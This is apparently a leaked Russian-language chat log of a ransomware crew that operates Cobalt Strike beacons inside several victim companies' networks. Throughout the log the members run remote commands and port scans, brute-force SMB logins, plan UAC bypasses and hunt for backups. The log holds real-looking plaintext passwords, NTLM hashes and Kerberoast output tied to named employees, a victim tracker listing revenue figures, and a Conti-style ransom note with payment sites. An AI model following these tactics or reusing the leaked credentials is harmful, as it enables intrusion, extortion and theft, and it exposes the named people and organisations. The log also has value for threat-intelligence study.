09/28/2020 03:24 PM 391 ad.bat
09/28/2020 03:22 PM 1,394,176 AdFind.exe
09/28/2020 01:55 PM 4,554 io.xml
09/23/2020 12:33 PM 303,098 kali-linux-2020.3-installer-amd64.iso.torrent
09/28/2020 02:55 PM 27 LEHA.txt
09/28/2020 01:55 PM 0 New Text Document.txt
09/28/2020 02:12 PM 935 Nmap - Zenmap GUI.lnk
09/28/2020 02:21 PM 7,978 nmap.7z
09/28/2020 02:19 PM 188,255 nmap.xml
09/23/2020 12:32 PM 867 µTorrent.lnk

``для начала попробовать рестартнуть@tl1что это может быть в смб_логине``
 Error: 10.20.4.78: Errno::EISDIR Is a directory @ io_fillbuf - fd:52 /home/user/Desktop/cobalt

``[ ](https://mediaeveryone.com/group/matches?msg=bsWTgZB5hY8rthErT) нет, но не находит``
====== MappedDrives

Mapped Drives (via WMI)

  LocalName : p:
  RemoteName: \\ho-fs01.matches.com\press
  RemotePath : \\ho-fs01.matches.com\press
  Status : Unavailable
  ConnectionState : Disconnected
  Persistent : True
  UserName :
  Description : RESOURCE REMEMBERED - Microsoft Windows Network

  LocalName : y:
  RemoteName : \\HO-FS01.matches.com\department
  RemotePath : \\HO-FS01.matches.com\department
  Status : Unavailable
  ConnectionState : Disconnected
  Persistent : True
  UserName :
  Description : RESOURCE REMEMBERED - Microsoft Windows Network
```а он не пустой?
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:faf5481720d381d2405ef4194ddb4770:::

DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1a20cb05b4b6db77e592dee4e974e4d9:::
``````
Domain: UKHECSLT3028
Login: Administrator
Password: 192837465S!
NTLM: f490c4823837a7d002e0176f3c5203ad


Domain : MATCHES
Login : mercedesd
Password: Dinham2323
NTLM : 7c839aa54221edb65e959f18ab9bde41


Domain : MATCHES.COM
Username : Louisad
Password: M@tches2020!!
NTLM: f74bc7faf8ddfbedb1441e9e42cdbb1c
``Отлично)+поднялся впн?всё норм это бабаесли вы хотите его пк подключить он может заметить что впн резко врубилсяможет и установочник лежит на ПКпоищите домен для подключения, доменные креды у вас естьразверните впн на дедике``
beacon> shell ipconfig /all
[*] Tasked beacon to run: ipconfig /all
[+] host called home, sent: 44 bytes
[+] received output:

Windows IP Configuration

   Host Name . . . . . . . . . . . . : UKHOEVLT3156
   Primary Dns Suffix . . . . . . . : matches.com
   Node Type . . . . . . . . . . . . : Mixed
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : matches.com
                                       Home

Ethernet adapter Ethernet 3:

   Media State. . . . . . . . . . . : Media disconnected
   Connection-specific DNS suffix :
   Description . . . . . . . . . . . : Fortinet SSL VPN Virtual Ethernet Adapter
   Physical Address. . . . . . . . . : 00-09-0F-AA-00-01
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Ethernet:

   Media State. . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix . : matches.com
   Description. . . . . . . . . : Intel(R) Ethernet Connection (6) I219-V
   Physical Address. . . . . . . . . : 00-68-EB-67-1A-A2
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Wireless LAN adapter Local Area Connection* 1:

   Media State. . . . . . . . . . . : Media disconnected
   Connection-specific DNS suffix :
   Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter
   Physical Address. . . . . . . . . : 04-ED-33-E4-5F-2B
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Wireless LAN adapter Local Area Connection* 10:

   Media State. . . . . . . . . . . : Media disconnected
   Connection-specific DNS suffix :
   Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter #2
   Physical Address. . . . . . . . . : 06-ED-33-E4-5F-2A
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Ethernet 2:

   Media State. . . . . . . . . . . : Media disconnected
   Connection-specific DNS suffix :
   Description . . . . . . . . . . . : Fortinet Virtual Ethernet Adapter (NDIS 6.30)
   Physical Address. . . . . . . . . : 00-09-0F-FE-00-01
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Wireless LAN adapter WiFi:

   Connection-specific DNS Suffix : Home
   Description . . . . . . . . . : Intel(R) Wi-Fi 6 AX200 160MHz
   Physical Address. . . . . . . . . : 04-ED-33-E4-5F-2A
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : 2a02:c7d:a28:5100:7de6:b515:bbeb:89c0(Preferred)
   IPv6 Address. . . . . . . . . . . : fdb0:64:3df8:0:7de6:b515:bbeb:89c0(Preferred)
   Temporary IPv6 Address. . . . . . : 2a02:c7d:a28:5100:5ce0:5b5c:1236:fc08(Preferred)
   Temporary IPv6 Address. . . . . . : fdb0:64:3df8:0:a9ec:ba3a:d314:b55e(Preferred)
   Link-local IPv6 Address . . . . . : fe80::7de6:b515:bbeb:89c0%11(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.0.80(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : Sunday, September 27, 2020 12:33:55 PM
   Lease Expires . . . . . . . . . Tuesday, September 29, 2020 9:42:09 AM
   Default Gateway . . . . . . . . fe80::7e4c:a5ff:fef9:c2a0%11
                                       192.168.0.1
   DHCP Server . . . . . . . . . . . : 192.168.0.1
   DHCPv6 IAID . . . . . . . . . . : 201649459
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-25-72-B4-85-00-68-EB-67-1A-A2
   DNS Servers . . . . . . . . . . . : fdb0:64:3df8:0:7e4c:a5ff:fef9:c2a0
                                       192.168.0.1
   NetBIOS over Tcpip. . . . . . . . : Enabled

````UKHOEVLT3156\Administrator faf5481720d381d2405ef4194ddb4770``MATCHES.COM\Louisad M@tches2020!!`слишком здоровый, вот и завернулесли вмещается в сообщении зачем заворачивать в файл?)``
URL : https://login.microsoftonline.com/common/login
Username : louisa.davies@matchesfashion.com
Password : Basil1234
```
скорее всего доменные креды.есть сессияtobi pizda)Морально я с вами парни) и оптимизируем действия чтобы сократить лишнее и бесполезнону дорабатываем/перебатываем всю солянку что у меня на винче из "рабочего" грубо говорясвязаный с разработкой полного авторского тулкита который мы пилимя сейчас сделаю канальчик один тематический
можно на пол часика будет отвлечься ради маленькой дискуссикроме юзер 7даребята, а все на месте сейчас?проекция лоигики прописанной в ОУ и групах на результаты сканирования с разных поинтовпоробуйте понять логику расположения "железок" которые блокируют порты
это может быть по физическому расположению, назначению функциональному, назначению "по отделам", просто железки между серверными и юзер сегментами
зачастую в таких сетях много ДК и подсети изолированы друг от друга но домен контроллеры нет для успешной репликациии почти никогда не ставятся на "машину технаря "фаеры ставятся на сегментыищите маршрутправильное решение - администрирование фаерволов сетевых которые запрещают входящие коннектыда и не факт что пропустит все равно это вряд ли сработает потому что нтлм рилей в текущем его состоянии может "бить" только на другую машину помимо той откуда инициируется коннектток спуфом каким-то чтобы не просто закепчурить а именно зарелеить авторизацюи с этой машиныникаки как это "запрещены входящие подключения"?
закрыты все порты? все порты?
но при этом мы смогли внедриться в сессию
```
в "исходящую" сессию?у меня вопрос, почему не сделать биндом?пока нетпока работаем в тех что были, но если есть новые - ждемнеа)нигде?вроде нету ДАа там где ДА?2 сетки близкие к тупикусесси для работы есть?долгоКак itc?ПриветВсем приветсегодня потолок это еще часик, готовим нехватку даных, завтра к обедугоспода, мне надо отойти по делам, я так понимаю что чем заняться есть, пишите, если чем смогу помочь подсказать - обязательно подскажу как вернусьhttps://www.stellarinfo.com/blog/exchange-mailbox-backup-using-powershell-cmdlets/?то есть условных технарей парочку .pst дернуть и окмм
не подскажу... я обычно выкачивал просто целевые ящики через EAC@tl2
вопрос по
>3) бэкап почтового сервера
получается подтянул я сервер с именем `Exchange.rtpco.local`
захожу в `C:\Program Files\Microsoft\Exchange Server\V15\Mailbox`
и выкачиваю вот это вотф дергали, хром же не расшифруем без мастеркеяподергайте браузеры у админов аккуратно без кобальт сессийкарбон злобный - факта, ну еще у них нет эксчейнджа, надо почту искатьпо #evo-com там все готово кроме двух насов в вокргрупе, их надо искать в браузерах админов, мы пока смотрели там только фс и ФФ, т.к. никуда не прыгали по машинам, работали с дедика по впном. Каброн все видит, так что если прыгнем куда-то- пойдет обраный отсчет и в этот же день ее надо закрывать. А время там -11, так что начинать надо где то в 9 - 10 утра.сегодня вообще по идее с трёхони еще не пришлиэто к @user3 и @user9
вроде они с этой сеткой работаютпо #evo-com как обстановка?привет
по #rtpcompany-com
нашлась куча esxi, которых в прошлый раз не обнаружили, и креды для них, осталось, вроде как, закончить с дополнительными задачами (скуль, эксч, etc)

по #waterway-com
так и не выцепили креды от нимблов, они их походу реально на бумажке передают, на айтишниках стоит кейлог, один из них в пятницу пытался и не смог зайти на нимбл, потом полез в ластпасс и сам себя там залочилподскажите какой прогресс был в конце прошлой недели по текущим задачам@tl1 сегодня отсутствует - так что я подменяювсем приветпока даникак не пробится? пока забили на эту сетку?`USIDgfs867gfusydkGTTKJUg`готовбилд?кобы потом стрешим+я думаю до 3+- еще поресерчим сеть и там уже можно будет начинатьтогда закроем сегоднянеа, в виме не подлкючен
по софту кроме вима ничегооблачных решений не нашли?по клаудам как?окейда а вообще он нам не так уж и нужен
посмотреть все хосты?
мы нашли два и в виме бэкапятся так же два[ ](https://mediaeveryone.com/group/overland-com?msg=5QfnebYASzT2PbuXp) сабнеты просканили, там нет намеков на центрещё `TESTLAB-PACKV9` но до неё вообще не достучатьсямне попались тачки
```
TEST044-R002V9
TEST044-R002
``для линукса вроде есть способ...а есть способ по гостевой тачке определить на каком хосте она крутится?мб вмцентр вне домена, все посмотрели?``
https://10.69.0.51/restgui/start.html``

```
```вообщем
центра управления хостами hyper-v, по всей видимости, нет
всего два хоста, на них крутятся 34 виртуалки, включенных +- половина
по ад серверов 76, еще не пинговали но по ощущениям так же мало живых
бэкапят они на diskstation(10.69.0.22) в основном файлопомойку и иногда сервера.
каких то еще бэкапов пока невидно``
http://10.69.0.90:5000/
```как обычно)да разобрались уже, смотрел только на ` Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),`так его не существуетReply from 10.69.201.15: Destination host unreachable.```
beacon> shell ping 10.69.201.21
[*] Tasked beacon to run: ping 10.69.201.21
[+] host called home, sent: 49 bytes
[+] received output:

Pinging 10.69.201.21 with 32 bytes of data:
Reply from 10.69.201.15: Destination host unreachable.
Reply from 10.69.201.15: Destination host unreachable.
Reply from 10.69.201.15: Destination host unreachable.

[+] received output:
Reply from 10.69.201.15: Destination host unreachable.

Ping statistics for 10.69.201.21:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

```[ ](https://mediaeveryone.com/group/overland-com?msg=mwdZmFecWDkt7TjDc) С этой же подсети[ ](https://mediaeveryone.com/group/overland-com?msg=Xfgnbd6C2RFa7d3Wo) beacon> shell ping -n 1 10.69.201.21
[Tasked beacon to run: ping -n 1 10.69.201.21
[+] host called home, sent: 53 bytes
[+] received output:

Pinging 10.69.201.21 with 32 bytes of data:
Reply from 10.69.201.15: Destination host unreachable.

Ping statistics for 10.69.201.21:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),и откуда пингуетедайте ответ на пингно смысл в портскане тогда?)да[ ](https://mediaeveryone.com/group/overland-com?msg=2CWKmH8yR33F2viCj) не понял вопроса? Покажет ли телнет что 22 порт открыт если сделать так telnet server_name 22 Думаю покажет``
beacon> portscan 10.69.201.21 445,443,5000 icmp 1024
[*] Tasked beacon to scan ports 445,443,5000 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

beacon> portscan 10.69.201.21 22 icmp 1024
[*] Tasked beacon to scan ports 22 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

beacon> portscan 10.69.201.21 80 icmp 1024
[*] Tasked beacon to scan ports 80 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

beacon> portscan 10.69.201.21 1-1000 icmp 1024
[*] Tasked beacon to scan ports 1-1000 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

beacon> portscan 10.69.201.21 1001-5000 icmp 1024
[*] Tasked beacon to scan ports 1001-5000 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

beacon> portscan 10.69.201.21 5001-10000 icmp 1024
[*] Tasked beacon to scan ports 5001-10000 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

```дайте ответ пингаа 22 открыт для телнета?)Я не помню как я делал, в моем случае пинга нет на ip. конечно можно чекнуть телнетом) От него вроде не утаишь)реплика на пинг отключается и внутри настроек самой системыпочему это?По моему он не должен пинговатся в таком случаемб нет открытых портов с точки сканаСтранный ip нет открытых портов 10.69.201.21http://10.69.0.22:5000/ nas c бэкапами (admin:CR@CKer$) фс видно от ДАэтот пароль на админ учетку из двух доменов`CR@CKer$`их нетскинь плз еще дисинки с этих доменовВсе живые ovrecomm.com
```
OVRECOMMAD01.ovrecomm.com
ovrdb2.ovrecomm.com
ovrdb1.ovrecomm.com
OVRECOMMAD02.ovrecomm.com
OVRDB1A.ovrecomm.com
OVRSCDB1.ovrecomm.com
``Все живые ovrweb.com

```
OVRWEBAD01.ovrweb.com
ovrweb1.ovrweb.com
rweb2.ovrweb.com
OVRWEBAD2.ovrweb.com
OVRWEBAD02.ovrweb.com
OVRWEB2A.ovrweb.com
OVRWEB1A.ovrweb.com
OVRSCWeb1.ovrweb.com
OVRSCWeb2.ovrweb.com
OVRSCWeb3.ovrweb.com
``нетпо задачам вопросы есть?+прилетела+и у вас будут все 3тогда прилетит еще одна из друго домена+у вас моя первая сессия осталась?nullpin.comдомен)кобу или домен?кобу дайтеходите тоже тихо, сессии со всех пк не тяните, можете переснять ад и проверить доступность хостовы там не снимаете дсинк и хешиспокойной ночиДо завтраок, до заврабзавтра к 6+ дам еще 2 домена посмотретьфинально проверим все тут и закроем полноценноперенесем на завтра закрытие тогдатак окейвидимо умер``
dn:CN=SYSTEMCENTER,CN=Computers,DC=overland,DC=com
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>objectClass: computer
>cn: SYSTEMCENTER
>distinguishedName: CN=SYSTEMCENTER,CN=Computers,DC=overland,DC=com
>instanceType: 4
>whenCreated: 20190613140038.0Z
>whenChanged: 20201117102629.0Z
>uSNCreated: 36464435
>uSNChanged: 46733431
>name: SYSTEMCENTER
>objectGUID: {11A33782-FF53-4D61-B6ED-92C585B680CC}
>userAccountControl: 4096
>badPwdCount: 0
>codePage: 0
>countryCode: 0
>badPasswordTime: 0
>lastLogoff: 0
>lastLogon: 132502892466357264
>localPolicyFlags: 0
>pwdLastSet: 132498579429186892
>primaryGroupID: 515
>objectSid: S-1-5-21-917468999-1386106184-2076119496-6860
>accountExpires: 9223372036854775807
>logonCount: 439
>sAMAccountName: SYSTEMCENTER$
>sAMAccountType: 805306369
>operatingSystem: Windows Server 2016 Standard
>operatingSystemVersion: 10.0 (14393)
>dNSHostName: SystemCenter.overland.com
>servicePrincipalName: WSMAN/SystemCenter.overland.com
>servicePrincipalName: WSMAN/SystemCenter
>servicePrincipalName: TERMSRV/SystemCenter.overland.com
>servicePrincipalName: TERMSRV/SYSTEMCENTER
>servicePrincipalName: RestrictedKrbHost/SYSTEMCENTER
>servicePrincipalName: HOST/SYSTEMCENTER
>servicePrincipalName: RestrictedKrbHost/SystemCenter.overland.com
>servicePrincipalName: HOST/SystemCenter.overland.com
>objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=overland,DC=com
>isCriticalSystemObject: FALSE
>dSCorePropagationData: 20200409185421.0Z
>dSCorePropagationData: 20190731210520.0Z
>dSCorePropagationData: 20190731210518.0Z
>dSCorePropagationData: 16010101181633.0Z
>lastLogonTimestamp: 132500823894234705
>msDS-SupportedEncryptionTypes: 28
``````
Ping request could not find host SystemCenter.overland.com. Please check the name and try again.

```в ад)а где ты его увидел?а это что за хост?SYSTEMCENTERконсоль veeam, облако не подключено``
--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : https://localhost/
Identity : overland\administrator
Credential :
LastModified : 1/21/2016 8:52:52 PM

--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : https://login.microsoftonline.com/
Identity : azureadadmin@overlandsheepskin.onmicrosoft.com
Credential :
LastModified : 3/16/2018 6:46:12 PM

--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : https://localhost/
Identity : administrator
Credential :
LastModified : 4/4/2017 7:35:39 PM

--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : https://localhost/
Identity : todd@overland.com
Credential :
LastModified : 1/16/2019 3:56:37 PM

```и там решим что делатьтогда пол часа еще на проверкусканим пока сетьтам гиперви сервера и хз где сфера и есть она вообщеНайти сферу, и чекнуть повторно сферы + есть подозрение что нас 10.69.0.90:5000 но он отключенсегодня закроем?`Elar1n22````
todd@mail.overland.com
OVERLAND\todd Elar1n55
``до завтраокей, до завтраДо завтрану значит на сегодня можно сворачиватьсяу3пали сессии1) посмотреть шары на предмет интересных файлов и скриптов содержащих другие креды
2) побрутить на популярные пассы sa акк на mssql серверах
3) посмотреть сетевые устройства на наличие доступа к ним по дефолтным паролям(роутеры/свитчи)что можно сделать? @tl2 @tl1elevate не работаетЛА, а юак обходить не хочетдоменный, но ЛА на своей тачкене имею понятия, пустил брут, до сих пор идёт, это было в первых строкаха SBolley разве не доменный пользователь?DC
```
[+] 192.168.90.6:445 - 192.168.90.6:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 192.168.11.42:445 - 192.168.11.42:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 192.168.110.42:445 - 192.168.110.42:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 10.220.136.40:445 - 10.220.136.40:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 192.168.30.42:445 - 192.168.30.42:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 192.168.11.43:445 - 192.168.11.43:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 10.200.132.52:445 - 10.200.132.52:445 - Success: '.\SBolley:thisduckingsucks!02'
```user8user4user3https://www.exploit-db.com/exploits/3220`spoolsv.exe`
вот такой процесс естьпоробуйте реализацию на шарпе что я скинул вышетакое может бытьполагаю алертит на необфусцированный пейлоад в б64 енкодеfodhelper на шарпе``
https://github.com/FatRodzianko/SharpBypassUAC
```ну и все отслаьыне тоже попробовали````
beacon> audit_uac
[*] Tasked Beacon to audit UAC settings
[+] host called home, sent: 149229 bytes
[+] received output:
[+] SBolley is a local Administrator!
[Info] DETSBOLLEY23063 is Windows 10.0.18363.

[+] Invoke-SluiBypass should work to bypass UAC.
[+] Invoke-FodhelperBypass should work to bypass UAC.
[+] Invoke-TokenDuplication should work to bypass UAC.
``` `
Invoke-FodhelperBypass - блочится AV
Invoke-SluiBypass - повесил сеиию
Invoke-TokenDuplication - не работаетвсе elevate методы не помогли?не получается пройти уак, ищем какестьЖивые люди тут есть?и он ругается на закодированую команду, он ругается на параметр `-Command`для чего это вообще?Как продвигается?да, не трогайтеможете работатьприлетела``
>memberOf: CN=SQL Financial
 
User: DBunte - IP Address: 192.168.90.2
 
User: Melissa - IP Address: 192.168.0.126
User: Melissa - IP Address: 192.168.0.28
  
User: srethmeier - IP Address: 192.168.0.124
  
User: achackes - IP Address: 192.168.0.61
```пока нашёл только >memberOf: CN=SQL Financialищу у кого выигрышнее дёрнуть точечноэксч серва не нашёлтут подготовите завтра?ну и почтаб но это все надо прям в сети делатьмогу вам предложить завтра закрыть все 3)у нас и в \ evo почти все готово, кроме пары насовпоэтому эти обе готовимони туда не часто гоняютут смысла ждать нет у моря погодыв таком духенаписать чет мой пароль не подходита-ля "ты че дурак он у тебя на стикере на мониторе "чтобы все было готовоэто надо делать все в день закрытияон может всякое ответитьтут все в моменте)очень опаснои вылетаем сразуахас одного айтишника напишем другому какой пасс от нимблалибо попробуем СИплан такой, мы либо закроем без нимбла но надо даныеэта тожетут есть бэкап .pst одного айтишникалично я пока в приорите с #rtpcompany-com работаю, так как она ближе к закрытиюпомимо нимбла остальное готово? бэкапы и прочеепока ничеготут у нас что?И распишите себе mindmap по поднятию прав от ЛП до ДАНапишите в ЛС подробные отчеты о проделанной работе за последние 2-3 дня. Пока можете заняться организацией записей по модулям и прочему, так же написать себе мануал по всем векторам которые были и в каком порядке лучше действовать. Заканчиваем в 20:00 сегодняhttps://fixmypc.ru/post/kak-naiti-zaloginenykh-polzovatelei-i-aktivnye-sessii-s-powershell/если работает нагрузка `beacon_reverse_tcp` в `Windows Executable (S)` который прошел через `shellConcatenation.1.0.0`, но при этом не работает через `rportfwd` скорее всего дело в самом `rportfwd`[ ](https://mediaeveryone.com/channel/general?msg=mQY8BtgM65Eh6Tpz6) а проверяли на обычном https листе? или уже на rportfwd?а чем не нравится `Attack -> Packages -> Payload Generator`?он в 255 раз большеДа, но не уверен, что сам `shellConcatenation.1.0.0` поддерживает такой размер файла RAW)а по поводу `rportfwd` не совсем понял
```
beacon> help rportfwd
Use: rportfwd [bind port] [forward host] [forward port]
     rportfwd stop [bind port]

Binds the specified port on the target host. When a connection comes in,
Cobalt Strike will make a connection to the forwarded host/port and use Beacon
to relay traffic between the two connections.
````Windows Executable (S) - RAW` - это stageless вариант, а именно когда вы делаете RAW через `Attack -> Packages -> Payload Generator` вы делаете промежуточный файл, который после запуска докачивает рабочий код самой кобы, в `Windows Executable` сразу этот рабочий код идет, без дополнительной подкачкиhiтогда до обеда работаем с ним все вместе+из сессий только MATCHES?Доброе утроВсем доброейчас спущусьВзглядомТелепатически? не испачкайтетолько аккуратно, она покрашенаБейте в дверь мощьно🗿Там забулдыгаДобра по утруБодрое утроувы( пока тихо(@tl2 по кербам тихо?(закреп не удавалось поставитьсессий нет``
otsql$benihana.com$MSSQLSvc/bensvr-corp.benihana.com S3curity!
ichiban$benihana.com$MSSQLSvc/bensvr-corp.benihana.com S3curity!
``бвот керь``
$krb5tgs$23$*admbchapman$benihana.com$MSSQLSvc/bensvr-corp.benihana.com S3curity!
```сесии умерли?+и пересниму разомпо всемполный отчет потом отдайтут 2фа, есть возможность сессии переснять?`adm 76.14.0.148 redwoodcity.org 192kk user8`щас зайду)не)я уж думал он ушел в мертвые т к там совсем движухи нет)где? у нас же еще третий естьменя просто напрягает что в general постоянно пишутмогу зайти)ну и кстати тебя в другом нету)ну и плюс я не совсем отсюда)втч пиндосы)тут 99 людей знает и так откуда яой блятьа у нас концерты Дельфина набережной
выставки диповых чуваков под кислотой
водка под Дядю Юрув этом рокете лишнее пишида и такой эфективный иногда)а движняк где-то далеко)а тут не
устал - налилэто в мск все там на пампе каком-то
соревновательном уровне
полном движнякеПривык что способмтвует)привык еще как)в том то и дело)разве не привык?)способствует)))как у нас всегда вцелом))у меня еще погода способствуетя тоже об этом подумываю в последнее время)но слишком стабильно прикладываюсь)и косяков нети даже все работаетне, я какбы тут
все окейну с начала декабря ужехорошо ты отдохнул)пока функционирую надо ловить момент)поеду лечиться)если до конца месяца не соскочуслезтьникак не могу с бухлачета я всеокей)и в ночь все закроютзавтра придут к 6пусть сегодня заготовятвыспятсяскажем - будут сидетьпросто выспаться хотят)тебе жалуются?)спать хотят совсемребятотпускайтам хеш будетмодулем в мсфечем можно сдамнуть учетку sa?и тпш уже нетсколько лет назад)ну да
ты вроде пусканулся ж туда не?сначала надо в сеть идтитак там из сетитут недавно)нарисовался никсовый 0д ЛПЕжив ли доступ на прод сервкакможешь на пейперсурс помотреть!!о кстати[еще этот пейперсурс ебучийесли там вебшелл вынеслиpens.com еще остался
но надо ехе чтобы его пусканутьтам еще триадметалз вроде есть если бот в сети можете взять
он бесхозныймогут заплатить могут не заплатить
это рулетка
ни от чего не зависит толкома они все в процесе...мне кажется нетпо сну они заплатят?все в работетам моих 4какие?еще ваши боты естьили вон на бекдореа смысл?снуеду сделай пока
там работы пиздец копейка((чувак оффлайн пока
будет к 22 где-то(я с ней поработаюдавай 2фа)))сделаеми скажи как остальные 3 переснять сессиину окей
если что работайте егобыл на момент отчета, а потом ушли на другие задачи)написано же)IN PROGRESSнеа, в работе только текущиесун.еду работаете?там впна больше нет по ипаку этомуже отметилда вижуглобалтранз250 мимо205.236.0.43
204.134.196.195
107.0.14.250

по этим трем переснять сессии?``
EXTERNAL INTERNAL VPN OWNER REVENUE STATUS LOG
lrhc.org lrhc.local 66.228.239.136 user8 140kk IN PROGRESS ntds, research
		205.236.0.43 user4 STOPPED no valid accounts
snu.edu 204.126.2.44 user7 IN PROGRESS
		204.134.196.195 user4 STOPPED 1 acc not valid, 1 acc 2fa
		107.0.14.250 2fa
globaltranz.com Globalnet.local 162.42.243.250 ERROR blocked

``````
EXTERNAL INTERNAL VPN OWNER REVENUE STATUS LOG
lrhc.org lrhc.local 66.228.239.136 user8 140kk IN PROGRESS ntds, research

``показать им что нехуй сливатьсяпочему бы и нетлол, мб в хелсы камбек сделаем? он у нас соника был)спслюбуюпод 4.1она та же что и былакакую?эээможешь пока скинуть инстру по настройке кобы?я себе пометки сделаюраспиши плиз актуальное состояние еще раза что у с впнами теми которые соникволы?что то в работу есть?оверленд собирается каплямиага окей = )``
All of your files are currently encrypted.
Backups were encrypted or deleted, same as Shadow Copies.

If you try to use any additional recovery software - the files might be damaged, but if you are still willing to try - try it on the data of the lowest value.

To make sure that we REALLY CAN recover all of the encryptd data - we offer you to decrypt 2 random files of your choice completely free of charge.

The faster you reply - the easier and cheaper it will be.
To receive information on the price of the recovery software you can contact our team directly for further instructions through our website :

TOR VERSION :
(you should download and install TOR browser first https://torproject.org)

http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/

HTTPS VERSION :
https://contirecovery.best

---BEGIN ID---
W2GzoYgyg5zZYaIAHs4u2MR6UaxLrzlsyRb8qzwHbzENpcIR8KkCR8gmXgaDryRo
---END ID---
``так и так ужеприветтаргет просилв записке уберите все кроме чата и инуткрукций как туда попасть
когда заказывать будешь билдыпривету нас их нету. и кейлогер не ставитсятут я хзпри подключении клиента фортика он просит логин и пароль на сколько помнюну или быстро вырубилисьпохоже нетпосле запуска команд интерфейсы поднялись?делал так
```
beacon> shell wmic nic get name, index
[*] Tasked beacon to run: wmic nic get name, index
[+] host called home, sent: 55 bytes
[+] received output:
Index Name

0 Microsoft Kernel Debug Network Adapter

1 Intel(R) Ethernet Connection (6) I219-V

2 Intel(R) Wi-Fi 6 AX200 160MHz

3 Microsoft Wi-Fi Direct Virtual Adapter

4 Fortinet Virtual Ethernet Adapter (NDIS 6.30)

5 Fortinet SSL VPN Virtual Ethernet Adapter

6 PPPoP WAN Adapter

7 WAN Miniport (SSTP)

8 WAN Miniport (IKEv2)

9 WAN Miniport (L2TP)

10 WAN Miniport (PPTP)

11 WAN Miniport (PPPOE)

12 WAN Miniport (IP)

13 WAN Miniport (IPv6)

14 WAN Miniport (Network Monitor)

15 Bluetooth Device (Personal Area Network)

16 Microsoft Wi-Fi Direct Virtual Adapter #2

17 Broadcom NetXtreme Gigabit Ethernet




beacon> shell wmic path win32_networkadapter where index=4 call enable
[*] Tasked beacon to run: wmic path win32_networkadapter where index=4 call enable
beacon> shell wmic path win32_networkadapter where index=5 call enable
[*] Tasked beacon to run: wmic path win32_networkadapter where index=5 call enable
[+] host called home, sent: 174 bytes
[+] received output:
Executing (\\UKHOEVLT3156\root\cimv2:Win32_NetworkAdapter.DeviceID="4")->enable()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ReturnValue = 0;
};


[+] received output:
Executing (\\UKHOEVLT3156\root\cimv2:Win32_NetworkAdapter.DeviceID="5")->enable()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ReturnValue = 0;
};

```да вроде дисконект``
                           [03]: Fortinet Virtual Ethernet Adapter (NDIS 6.30)
                                 Connection Name: Ethernet 2
                                 Status: Media disconnected
                           [04]: Fortinet SSL VPN Virtual Ethernet Adapter
                                 Connection Name: Ethernet 3
                                 Status: Media disconnected
``````
Windows IP Configuration


Ethernet adapter Ethernet 3:

   Media State. . . . . . . . . . . : Media disconnected
   Connection-specific DNS suffix :

Ethernet adapter Ethernet:

   Media State. . . . . . . . . . . : Media disconnected
   Connection-specific DNS suffix :

Wireless LAN adapter Local Area Connection* 1:

   Media State. . . . . . . . . . . : Media disconnected
   Connection-specific DNS suffix :

Wireless LAN adapter Local Area Connection* 10:

   Media State. . . . . . . . . . . : Media disconnected
   Connection-specific DNS suffix :

Ethernet adapter Ethernet 2:

   Media State. . . . . . . . . . . : Media disconnected
   Connection-specific DNS suffix :

Wireless LAN adapter WiFi:

   Connection-specific DNS Suffix :
   IPv6 Address. . . . . . . . . . . : 2a02:c7d:a28:5100:7de6:b515:bbeb:89c0
   IPv6 Address. . . . . . . . . . . : fdb0:64:3df8:0:7de6:b515:bbeb:89c0
   Temporary IPv6 Address. . . . . . : 2a02:c7d:a28:5100:c889:fce9:a8e0:ab10
   Temporary IPv6 Address. . . . . . : fdb0:64:3df8:0:c889:fce9:a8e0:ab10
   Link-local IPv6 Address . . . . . : fe80::7de6:b515:bbeb:89c0%11
   IPv4 Address. . . . . . . . . . . : 192.168.0.80
